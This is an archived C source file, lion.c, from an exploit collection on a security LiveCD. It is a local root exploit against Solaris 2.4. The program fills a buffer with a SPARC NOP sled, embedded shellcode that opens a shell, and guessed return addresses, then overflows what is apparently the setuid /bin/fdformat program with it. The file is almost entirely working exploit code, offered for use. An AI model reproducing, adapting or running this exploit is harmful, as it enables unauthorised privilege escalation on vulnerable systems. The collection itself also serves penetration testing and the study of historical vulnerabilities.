home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lion.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  1KB  |  58 lines

---

1. /* Solaris 2.4 */
2.  
3. #include <stdio.h>
4. #include <stdlib.h>
5. #include <sys/types.h>
6. #include <unistd.h>
7.  
8. #define BUF_LENGTH 264
9. #define EXTRA 36
10. #define STACK_OFFSET -56
11. #define SPARC_NOP 0xa61cc013
12.  
13. u_char sparc_shellcode[] =
14.  
15.   "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
16.   "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
17.   "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
18.   "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
19.   "\x91\xd0\x20\x08"
20.   ;
21.  
22. u_long get_sp(void)
23. {
24.   __asm__("mov %sp,%i0 \n");
25. }
26.  
27. void main(int argc, char *argv[])
28. {
29.   char buf[BUF_LENGTH + EXTRA + 8];
30.   long targ_addr;
31.   u_long *long_p;
32.   u_char *char_p;
33.   int i, code_length = strlen(sparc_shellcode),dso=0;
34.  
35.   if(argc > 1) dso=atoi(argv[1]);
36.  
37.   long_p =(u_long *) buf ;
38.   targ_addr = get_sp() - STACK_OFFSET - dso;
39.  
40.   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
41.     *long_p++ = SPARC_NOP;
42.  
43.   char_p = (u_char *) long_p;
44.  
45.   for (i = 0; i < code_length; i++)
46.     *char_p++ = sparc_shellcode[i];
47.  
48.   long_p = (u_long *) char_p;
49.  
50.   for (i = 0; i < EXTRA / sizeof(u_long); i++)
51.     *long_p++ =targ_addr;
52.  
53.   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
54.          targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
55.   execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
56.   perror("execl failed");
57. }
58. /*                    www.hack.co.za              [2000]*/